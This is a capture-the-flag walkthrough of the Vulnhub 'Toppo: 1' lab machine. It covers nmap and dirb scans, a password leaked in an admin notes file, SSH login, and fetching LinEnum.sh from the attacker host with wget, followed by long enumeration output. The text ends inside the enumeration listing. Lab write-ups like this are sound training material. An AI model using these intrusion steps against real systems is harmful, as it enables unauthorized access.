Toppo 1

Toppo: 1 Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/Toppo 192.168.43.243

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 03:45 EDT
Nmap scan report for Toppo (192.168.43.243)
Host is up (0.00076s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|   256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          53154/udp   status
|   100024  1          53934/udp6  status
|   100024  1          58497/tcp   status
|_  100024  1          59067/tcp6  status
MAC Address: 00:0C:29:D9:A7:6B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.88 seconds

After we put the IP to the web browser, we got this

Nothing seems to be interesting so I went to dirb

dirb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun May 17 05:28:05 2020
URL_BASE: http://192.168.43.243/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.43.243/ ----
==> DIRECTORY: http://192.168.43.243/admin/                                                                                                
==> DIRECTORY: http://192.168.43.243/css/                                                                                                  
==> DIRECTORY: http://192.168.43.243/img/                                                                                                  
+ http://192.168.43.243/index.html (CODE:200|SIZE:6437)                                                                                    
==> DIRECTORY: http://192.168.43.243/js/                                                                                                   
+ http://192.168.43.243/LICENSE (CODE:200|SIZE:1093)                                                                                       
==> DIRECTORY: http://192.168.43.243/mail/                                                                                                 
==> DIRECTORY: http://192.168.43.243/manual/                                                                                               
+ http://192.168.43.243/server-status (CODE:403|SIZE:302)                                                                                  
==> DIRECTORY: http://192.168.43.243/vendor/

As we can see here there is a admin that might have some interesting stuffs inside, let's take a look into it.

Got this and when we click into the notes.txt

We got the password for the ssh!

ssh

From the password, I guess the username is ted and the password is 12345ted123, then we ssh into the user

We manage to login!

Exploitation

LinEnum.sh

I use this script to enumerate the machine.

By using the python -m SimpleHTTPServer, we can transfer files from our machine to victim's machine

Our Machine:

Victim's Machine:

wget 192.168.43.182:8000/LinEnum.sh

After that, chmod +x LinEnum.sh to make it executable

run by typing ./LinEnum.sh

-rwxr-xr-x  1 root root  4125 Feb 10  2018 exim4-base
-rwxr-xr-x  1 root root    89 Nov  8  2014 logrotate
-rwxr-xr-x  1 root root  1293 Dec 31  2014 man-db
-rwxr-xr-x  1 root root   435 Jun 13  2013 mlocate
-rwxr-xr-x  1 root root   249 May 17  2017 passwd
-rw-r--r--  1 root root   102 Jun  7  2015 .placeholder

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Apr 15  2018 .
drwxr-xr-x 90 root root 4096 May 17 04:21 ..
-rw-r--r--  1 root root  102 Jun  7  2015 .placeholder

/etc/cron.monthly:
total 16
drwxr-xr-x  2 root root 4096 Apr 15  2018 .
drwxr-xr-x 90 root root 4096 May 17 04:21 ..
-rwxr-xr-x  1 root root  313 Dec 28  2014 0anacron
-rw-r--r--  1 root root  102 Jun  7  2015 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 Apr 15  2018 .
drwxr-xr-x 90 root root 4096 May 17 04:21 ..
-rwxr-xr-x  1 root root  312 Dec 28  2014 0anacron
-rwxr-xr-x  1 root root  771 Dec 31  2014 man-db
-rw-r--r--  1 root root  102 Jun  7  2015 .placeholder


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[-] Anacron jobs and associated file permissions:
-rw-r--r-- 1 root root 401 Dec 28  2014 /etc/anacrontab
# /etc/anacrontab: configuration file for anacron

# See anacron(8) and anacrontab(5) for details.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root

# These replace cron's entries
1       5       cron.daily      run-parts --report /etc/cron.daily
7       10      cron.weekly     run-parts --report /etc/cron.weekly
@monthly        15      cron.monthly    run-parts --report /etc/cron.monthly


[-] When were jobs last executed (/var/spool/anacron contents):
total 20
drwxr-xr-x 2 root root 4096 Apr 15  2018 .
drwxr-xr-x 6 root root 4096 Apr 15  2018 ..
-rw------- 1 root root    9 May 17 02:47 cron.daily
-rw------- 1 root root    9 May 17 02:57 cron.monthly
-rw------- 1 root root    9 May 17 02:52 cron.weekly


[-] Systemd timers:
NEXT                         LEFT     LAST                         PASSED       UNIT                         ACTIVATES
Mon 2020-05-18 02:57:05 CDT  22h left Sun 2020-05-17 02:57:05 CDT  1h 38min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

1 timers listed.
Enable thorough tests to see inactive timers


### NETWORKING  ##########################################
[-] Network and IP info:
eth0      Link encap:Ethernet  HWaddr 00:0c:29:d9:a7:6b  
          inet addr:192.168.43.243  Bcast:192.168.43.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fed9:a76b/64 Scope:Link
          inet6 addr: 2001:d08:1013:1e84:20c:29ff:fed9:a76b/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:345209 errors:1 dropped:2 overruns:0 frame:0
          TX packets:283797 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:46933742 (44.7 MiB)  TX bytes:98213804 (93.6 MiB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:8 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:792 (792.0 B)  TX bytes:792 (792.0 B)


[-] ARP history:
fe80::16d1:69ff:fe52:5d6a dev eth0 lladdr 14:d1:69:52:5d:6a router STALE
192.168.43.67 dev eth0 lladdr 00:0c:29:20:b4:b1 STALE
192.168.43.182 dev eth0 lladdr 00:0c:29:20:b4:b1 REACHABLE
192.168.43.1 dev eth0 lladdr 14:d1:69:52:5d:6a STALE


[-] Nameserver(s):
nameserver 192.168.43.1


[-] Default route:
default via 192.168.43.1 dev eth0 


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:58497           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
tcp6       0      0 :::59067                :::*                    LISTEN      -               
tcp6       0      0 :::111                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:20820           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:53154           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:995             0.0.0.0:*                           -               
udp        0      0 127.0.0.1:1006          0.0.0.0:*                           -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -               
udp6       0      0 :::53934                :::*                                -               
udp6       0      0 :::35695                :::*                                -               
udp6       0      0 :::995                  :::*                                -               
udp6       0      0 :::111                  :::*                                -               


### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  22808  4040 ?        Ss   02:42   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S    02:42   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    02:42   0:01 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   02:42   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        S    02:42   0:00 [kworker/u2:0]
root         7  0.0  0.0      0     0 ?        S    02:42   0:00 [watchdog/0]
root         8  0.0  0.0      0     0 ?        S<   02:42   0:00 [khelper]
root         9  0.0  0.0      0     0 ?        S    02:42   0:00 [kdevtmpfs]
root        10  0.0  0.0      0     0 ?        S<   02:42   0:00 [netns]
root        11  0.0  0.0      0     0 ?        S    02:42   0:00 [khungtaskd]
root        12  0.0  0.0      0     0 ?        S<   02:42   0:00 [writeback]
root        13  0.0  0.0      0     0 ?        SN   02:42   0:00 [ksmd]
root        14  0.0  0.0      0     0 ?        S<   02:42   0:00 [crypto]
root        15  0.0  0.0      0     0 ?        S<   02:42   0:00 [kintegrityd]
root        16  0.0  0.0      0     0 ?        S<   02:42   0:00 [bioset]
root        17  0.0  0.0      0     0 ?        S<   02:42   0:00 [kblockd]
root        19  0.0  0.0      0     0 ?        S    02:42   0:00 [kswapd0]
root        20  0.0  0.0      0     0 ?        S    02:42   0:00 [fsnotify_mark]
root        26  0.0  0.0      0     0 ?        S<   02:42   0:00 [kthrotld]
root        27  0.0  0.0      0     0 ?        S<   02:42   0:00 [ipv6_addrconf]
root        28  0.0  0.0      0     0 ?        S<   02:42   0:00 [deferwq]
root        63  0.0  0.0      0     0 ?        S<   02:42   0:00 [ata_sff]
root        64  0.0  0.0      0     0 ?        S<   02:42   0:00 [mpt_poll_0]
root        65  0.0  0.0      0     0 ?        S    02:42   0:00 [khubd]
root        66  0.0  0.0      0     0 ?        S<   02:42   0:00 [mpt/0]
root        67  0.0  0.0      0     0 ?        S<   02:42   0:00 [kpsmoused]
root        69  0.0  0.0      0     0 ?        S    02:42   0:00 [scsi_eh_0]
root        70  0.0  0.0      0     0 ?        S<   02:42   0:00 [scsi_tmf_0]
root        71  0.0  0.0      0     0 ?        S    02:42   0:00 [scsi_eh_1]
root        72  0.0  0.0      0     0 ?        S    02:42   0:00 [kworker/u2:2]
root        74  0.0  0.0      0     0 ?        S<   02:42   0:00 [scsi_tmf_1]
root        75  0.0  0.0      0     0 ?        S    02:42   0:00 [scsi_eh_2]
root        76  0.0  0.0      0     0 ?        S<   02:42   0:00 [scsi_tmf_2]
root        80  0.0  0.0      0     0 ?        S<   02:42   0:00 [kworker/0:1H]
root       101  0.0  0.0      0     0 ?        S    02:42   0:00 [jbd2/sda1-8]
root       102  0.0  0.0      0     0 ?        S<   02:42   0:00 [ext4-rsv-conver]
root       133  0.0  0.0      0     0 ?        S    02:42   0:00 [kauditd]
root       138  0.0  0.2   9376  4644 ?        Ss   02:42   0:05 /lib/systemd/systemd-journald
root       142  0.0  0.1  12484  3304 ?        Ss   02:42   0:00 /lib/systemd/systemd-udevd
root       178  0.0  0.0      0     0 ?        S<   02:42   0:00 [ttm_swap]
root       183  0.0  0.0      0     0 ?        S<   02:42   0:00 [kworker/u3:0]
root       186  0.0  0.0      0     0 ?        S<   02:42   0:00 [hci0]
root       187  0.0  0.0      0     0 ?        S<   02:42   0:00 [hci0]
root       220  0.0  0.0      0     0 ?        S<   02:42   0:00 [kworker/u3:2]
root       396  0.0  0.1   4444  2832 ?        Ss   02:42   0:00 /sbin/rpcbind -w
statd      406  0.0  0.1   4620  2904 ?        Ss   02:42   0:00 /sbin/rpc.statd
root       415  0.0  0.0      0     0 ?        S<   02:42   0:00 [rpciod]
root       417  0.0  0.0      0     0 ?        S<   02:42   0:00 [nfsiod]
root       424  0.0  0.0   2920  1608 ?        Ss   02:42   0:00 /usr/sbin/rpc.idmapd
root       425  0.0  0.1   5412  3532 ?        Ss   02:42   0:00 /usr/lib/bluetooth/bluetoothd
root       427  0.0  0.1   5012  2784 ?        Ss   02:42   0:00 /usr/sbin/cron -f
daemon     428  0.0  0.0   2648  1892 ?        Ss   02:42   0:00 /usr/sbin/atd -f
root       431  0.0  0.1   3528  2452 ?        Ss   02:42   0:00 /lib/systemd/systemd-logind
message+   434  0.0  0.1   5348  3400 ?        Ss   02:42   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root       444  0.0  0.1  31096  3536 ?        Ssl  02:42   0:01 /usr/sbin/rsyslogd -n
root       446  0.0  0.0   2196  1600 ?        Ss   02:42   0:00 /usr/sbin/acpid
root       449  0.0  0.0   4176  2056 tty1     Ss+  02:42   0:00 /sbin/agetty --noclear tty1 linux
root       490  0.0  0.2   8108  4812 ?        Ss   02:42   0:02 /usr/sbin/sshd -D
root       571  0.0  0.9  94272 20588 ?        Ss   02:42   0:00 /usr/sbin/apache2 -k start
Debian-+   728  0.0  0.1   9936  2980 ?        Ss   02:42   0:00 /usr/sbin/exim4 -bd -q30m
root       749  0.0  0.3   9248  6780 ?        Ss   02:42   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
www-data   966  0.0  0.3  94744  7712 ?        S    02:47   0:05 /usr/sbin/apache2 -k start
www-data   967  0.0  0.3  94736  7680 ?        S    02:47   0:05 /usr/sbin/apache2 -k start
www-data   968  0.0  0.3  94736  7600 ?        S    02:47   0:05 /usr/sbin/apache2 -k start
www-data   969  0.0  0.3  94736  7672 ?        S    02:47   0:05 /usr/sbin/apache2 -k start
www-data   970  0.0  0.5  94728 11164 ?        S    02:47   0:05 /usr/sbin/apache2 -k start
www-data  1221  0.0  0.3  94736  7504 ?        S    02:47   0:05 /usr/sbin/apache2 -k start
www-data  1223  0.0  0.3  94720  7596 ?        S    02:47   0:05 /usr/sbin/apache2 -k start
www-data  1224  0.0  0.3  94736  7532 ?        S    02:47   0:05 /usr/sbin/apache2 -k start
www-data  1225  0.0  0.5  94736 11084 ?        S    02:47   0:05 /usr/sbin/apache2 -k start
www-data  1226  0.0  0.4  94736 10320 ?        S    02:47   0:05 /usr/sbin/apache2 -k start
ted       7567  0.0  0.0   2920  1504 ?        Ss   04:00   0:00 /usr/sbin/rpc.idmapd
root      8651  0.0  0.0      0     0 ?        S    04:22   0:00 [kworker/0:1]
root      8669  0.0  0.0      0     0 ?        S    04:27   0:00 [kworker/0:2]
root      8670  0.0  0.2  11120  5404 ?        Ss   04:30   0:00 sshd: ted [priv]    
ted       8672  0.0  0.2  11120  4440 ?        S    04:30   0:00 sshd: ted@pts/0     
ted       8673  0.0  0.2   6396  4564 pts/0    Ss   04:30   0:00 -bash
root      8683  0.0  0.0      0     0 ?        S    04:32   0:00 [kworker/0:0]
ted       8696  0.0  0.1   5844  3756 pts/0    S+   04:35   0:00 /bin/bash ./LinEnum.sh
ted       8697  0.0  0.1   5880  3344 pts/0    S+   04:35   0:00 /bin/bash ./LinEnum.sh
ted       8698  0.0  0.0   3748  1616 pts/0    S+   04:35   0:00 tee -a
ted       8878  0.0  0.1   5880  2620 pts/0    S+   04:35   0:00 /bin/bash ./LinEnum.sh
ted       8879  0.0  0.1   4772  2468 pts/0    R+   04:35   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
1.1M -rwxr-xr-x 1 root root 1.1M Nov  5  2016 /bin/bash
260K -rwxr-xr-x 1 root root 258K Apr  8  2017 /lib/systemd/systemd-journald
528K -rwxr-xr-x 1 root root 526K Apr  8  2017 /lib/systemd/systemd-logind
296K -rwxr-xr-x 1 root root 294K Apr  8  2017 /lib/systemd/systemd-udevd
 36K -rwxr-xr-x 1 root root  34K Mar 29  2015 /sbin/agetty
   0 lrwxrwxrwx 1 root root   20 Apr  8  2017 /sbin/init -> /lib/systemd/systemd
 48K -rwxr-xr-x 1 root root  46K May  4  2017 /sbin/rpcbind
 76K -rwxr-xr-x 1 root root  75K Aug 13  2014 /sbin/rpc.statd
508K -rwxr-xr-x 1 root root 507K Nov 21  2016 /usr/bin/dbus-daemon
1.1M -rwxr-xr-x 1 root root 1.1M Sep 13  2017 /usr/lib/bluetooth/bluetoothd
 52K -rwxr-xr-x 1 root root  50K Nov  8  2014 /usr/sbin/acpid
628K -rwxr-xr-x 1 root root 628K Mar 31  2018 /usr/sbin/apache2
 24K -rwxr-xr-x 1 root root  22K Sep 30  2014 /usr/sbin/atd
 44K -rwxr-xr-x 1 root root  43K Jun  7  2015 /usr/sbin/cron
1.1M -rwsr-xr-x 1 root root 1.1M Feb 10  2018 /usr/sbin/exim4
 32K -rwxr-xr-x 1 root root  31K Aug 13  2014 /usr/sbin/rpc.idmapd
640K -rwxr-xr-x 1 root root 638K Dec 20  2015 /usr/sbin/rsyslogd
932K -rwxr-xr-x 1 root root 931K Nov 19  2017 /usr/sbin/sshd


[-] /etc/init.d/ binary permissions:
total 256
drwxr-xr-x  2 root root  4096 Apr 15  2018 .
drwxr-xr-x 90 root root  4096 May 17 04:21 ..
-rwxr-xr-x  1 root root  2243 Nov  8  2014 acpid
-rwxr-xr-x  1 root root  2014 Dec 28  2014 anacron
-rwxr-xr-x  1 root root 10192 Apr 15  2018 apache2
-rwxr-xr-x  1 root root  1071 Sep 30  2014 atd
-rwxr-xr-x  1 root root  2948 Sep 13  2017 bluetooth
-rwxr-xr-x  1 root root  1276 Apr  6  2015 bootlogs
-rwxr-xr-x  1 root root  1248 Apr  6  2015 bootmisc.sh
-rwxr-xr-x  1 root root  3807 Apr  6  2015 checkfs.sh
-rwxr-xr-x  1 root root  1072 Apr  6  2015 checkroot-bootclean.sh
-rwxr-xr-x  1 root root  9290 Apr  6  2015 checkroot.sh
-rwxr-xr-x  1 root root  1379 Dec  8  2011 console-setup
-rwxr-xr-x  1 root root  3049 Oct 23  2014 cron
-rwxr-xr-x  1 root root  2813 Oct 10  2016 dbus
-rw-r--r--  1 root root  1468 Apr 15  2018 .depend.boot
-rw-r--r--  1 root root   497 Apr 15  2018 .depend.start
-rw-r--r--  1 root root   567 Apr 15  2018 .depend.stop
-rwxr-xr-x  1 root root  6606 Feb 10  2018 exim4
-rwxr-xr-x  1 root root  1336 Apr  6  2015 halt
-rwxr-xr-x  1 root root  1423 Apr  6  2015 hostname.sh
-rwxr-xr-x  1 root root  3916 Mar 29  2015 hwclock.sh
-rwxr-xr-x  1 root root  8189 Oct 25  2014 kbd
-rwxr-xr-x  1 root root  1591 Sep 30  2012 keyboard-setup
-rwxr-xr-x  1 root root  1300 Apr  6  2015 killprocs
-rwxr-xr-x  1 root root  1990 Sep 23  2014 kmod
-rwxr-xr-x  1 root root   995 Apr  6  2015 motd
-rwxr-xr-x  1 root root   677 Apr  6  2015 mountall-bootclean.sh
-rwxr-xr-x  1 root root  2138 Apr  6  2015 mountall.sh
-rwxr-xr-x  1 root root  1461 Apr  6  2015 mountdevsubfs.sh
-rwxr-xr-x  1 root root  1564 Apr  6  2015 mountkernfs.sh
-rwxr-xr-x  1 root root   685 Apr  6  2015 mountnfs-bootclean.sh
-rwxr-xr-x  1 root root  2456 Apr  6  2015 mountnfs.sh
-rwxr-xr-x  1 root root  4760 Dec 14  2014 networking
-rwxr-xr-x  1 root root  5658 Aug 12  2014 nfs-common
-rwxr-xr-x  1 root root  1192 Mar  6  2015 procps
-rwxr-xr-x  1 root root  6228 Apr  6  2015 rc
-rwxr-xr-x  1 root root   820 Apr  6  2015 rc.local
-rwxr-xr-x  1 root root   117 Apr  6  2015 rcS
-rw-r--r--  1 root root  2427 Apr  6  2015 README
-rwxr-xr-x  1 root root   661 Apr  6  2015 reboot
-rwxr-xr-x  1 root root  1042 Apr  6  2015 rmnologin
-rwxr-xr-x  1 root root  2512 Sep 20  2015 rpcbind
-rwxr-xr-x  1 root root  2796 Dec 14  2015 rsyslog
-rwxr-xr-x  1 root root  3207 Apr  6  2015 sendsigs
-rwxr-xr-x  1 root root   597 Apr  6  2015 single
-rw-r--r--  1 root root  1087 Apr  6  2015 skeleton
-rwxr-xr-x  1 root root  4077 Nov 18  2017 ssh
-rwxr-xr-x  1 root root  6581 Mar  9  2017 udev
-rwxr-xr-x  1 root root   461 Mar  9  2017 udev-finish
-rwxr-xr-x  1 root root  2737 Apr  6  2015 umountfs
-rwxr-xr-x  1 root root  2202 Apr  6  2015 umountnfs.sh
-rwxr-xr-x  1 root root  1129 Apr  6  2015 umountroot
-rwxr-xr-x  1 root root  3111 Apr  6  2015 urandom


[-] /etc/init/ config file permissions:
total 68
drwxr-xr-x  2 root root 4096 Apr 15  2018 .
drwxr-xr-x 90 root root 4096 May 17 04:21 ..
-rw-r--r--  1 root root  278 Dec 28  2014 anacron.conf
-rw-r--r--  1 root root 2493 Jun  3  2014 networking.conf
-rw-r--r--  1 root root  933 Jun  3  2014 network-interface.conf
-rw-r--r--  1 root root  530 Jun  3  2014 network-interface-container.conf
-rw-r--r--  1 root root 1756 May  4  2013 network-interface-security.conf
-rw-r--r--  1 root root  815 Sep 20  2015 portmap-wait.conf
-rw-r--r--  1 root root  209 Sep 20  2015 rpcbind-boot.conf
-rw-r--r--  1 root root 1042 Sep 20  2015 rpcbind.conf
-rw-r--r--  1 root root  641 Nov 18  2017 ssh.conf
-rw-r--r--  1 root root  581 Apr 10  2014 startpar-bridge.conf
-rw-r--r--  1 root root  337 Mar  9  2017 udev.conf
-rw-r--r--  1 root root  637 Mar  9  2017 udev-fallback-graphics.conf
-rw-r--r--  1 root root  643 Mar  9  2017 udev-finish.conf
-rw-r--r--  1 root root  356 Mar  9  2017 udevmonitor.conf
-rw-r--r--  1 root root  352 Mar  9  2017 udevtrigger.conf


[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 6.6M
drwxr-xr-x 20 root root  36K Apr 15  2018 system
drwxr-xr-x  2 root root 4.0K Apr 15  2018 network
drwxr-xr-x  2 root root 4.0K Apr 15  2018 system-generators
drwxr-xr-x  2 root root 4.0K Apr 15  2018 system-preset
-rwxr-xr-x  1 root root 294K Apr  8  2017 systemd-udevd
-rwxr-xr-x  1 root root  46K Apr  8  2017 systemd-activate
-rwxr-xr-x  1 root root  82K Apr  8  2017 systemd-bootchart
-rwxr-xr-x  1 root root  66K Apr  8  2017 systemd-cryptsetup
-rwxr-xr-x  1 root root 262K Apr  8  2017 systemd-fsck
-rwxr-xr-x  1 root root 298K Apr  8  2017 systemd-hostnamed
-rwxr-xr-x  1 root root 258K Apr  8  2017 systemd-journald
-rwxr-xr-x  1 root root 306K Apr  8  2017 systemd-localed
-rwxr-xr-x  1 root root  34K Apr  8  2017 systemd-remount-fs
-rwxr-xr-x  1 root root  26K Apr  8  2017 systemd-reply-password
-rwxr-xr-x  1 root root  42K Apr  8  2017 systemd-rfkill
-rwxr-xr-x  1 root root 1.3M Apr  8  2017 systemd
-rwxr-xr-x  1 root root  54K Apr  8  2017 systemd-backlight
-rwxr-xr-x  1 root root 298K Apr  8  2017 systemd-bus-proxyd
-rwxr-xr-x  1 root root 238K Apr  8  2017 systemd-cgroups-agent
-rwxr-xr-x  1 root root 526K Apr  8  2017 systemd-logind
-rwxr-xr-x  1 root root  42K Apr  8  2017 systemd-modules-load
-rwxr-xr-x  1 root root  14K Apr  8  2017 systemd-multi-seat-x
-rwxr-xr-x  1 root root  74K Apr  8  2017 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  26K Apr  8  2017 systemd-random-seed
-rwxr-xr-x  1 root root  78K Apr  8  2017 systemd-socket-proxyd
-rwxr-xr-x  1 root root  22K Apr  8  2017 systemd-user-sessions
-rwxr-xr-x  1 root root  34K Apr  8  2017 systemd-binfmt
-rwxr-xr-x  1 root root 246K Apr  8  2017 systemd-initctl
-rwxr-xr-x  1 root root 330K Apr  8  2017 systemd-machined
-rwxr-xr-x  1 root root 546K Apr  8  2017 systemd-networkd
-rwxr-xr-x  1 root root  74K Apr  8  2017 systemd-readahead
-rwxr-xr-x  1 root root  78K Apr  8  2017 systemd-resolved
-rwxr-xr-x  1 root root  38K Apr  8  2017 systemd-shutdownd
-rwxr-xr-x  1 root root 310K Apr  8  2017 systemd-timedated
-rwxr-xr-x  1 root root 110K Apr  8  2017 systemd-timesyncd
-rwxr-xr-x  1 root root 242K Apr  8  2017 systemd-update-utmp
-rwxr-xr-x  1 root root 9.4K Apr  8  2017 systemd-ac-power
-rwxr-xr-x  1 root root  30K Apr  8  2017 systemd-quotacheck
-rwxr-xr-x  1 root root  90K Apr  8  2017 systemd-shutdown
-rwxr-xr-x  1 root root  50K Apr  8  2017 systemd-sleep
-rwxr-xr-x  1 root root  38K Apr  8  2017 systemd-sysctl
-rwxr-xr-x  1 root root  546 Apr  8  2017 debian-fixup
-rwxr-xr-x  1 root root  462 Apr  8  2017 systemd-logind-launch
drwxr-xr-x  2 root root 4.0K Apr  8  2017 system-shutdown
drwxr-xr-x  2 root root 4.0K Apr  8  2017 system-sleep

/lib/systemd/system:
total 688K
drwxr-xr-x 2 root root 4.0K Apr 15  2018 dbus.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 apache2.service.d
drwxr-xr-x 2 root root 4.0K Apr 15  2018 getty.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 runlevel5.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 timers.target.wants
drwxr-xr-x 2 root root 4.0K Apr 15  2018 networking.service.d
-rw-r--r-- 1 root root  404 Nov 18  2017 ssh.service
-rw-r--r-- 1 root root  196 Nov 18  2017 ssh@.service
-rw-r--r-- 1 root root  216 Nov 18  2017 ssh.socket
-rw-r--r-- 1 root root  244 Oct 14  2017 wpa_supplicant.service
-rw-r--r-- 1 root root  338 Sep 13  2017 bluetooth.service
lrwxrwxrwx 1 root root   21 Apr  8  2017 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root   14 Apr  8  2017 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root    9 Apr  8  2017 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root   13 Apr  8  2017 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root   25 Apr  8  2017 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root   23 Apr  8  2017 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root   22 Apr  8  2017 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root   24 Apr  8  2017 dbus-org.freedesktop.machine1.service -> systemd-machined.service
lrwxrwxrwx 1 root root   25 Apr  8  2017 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
lrwxrwxrwx 1 root root   16 Apr  8  2017 default.target -> graphical.target
lrwxrwxrwx 1 root root    9 Apr  8  2017 fuse.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 halt.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 hostname.service -> /dev/null
lrwxrwxrwx 1 root root    9 Apr  8  2017 hwclockfirst.service -> /dev/null
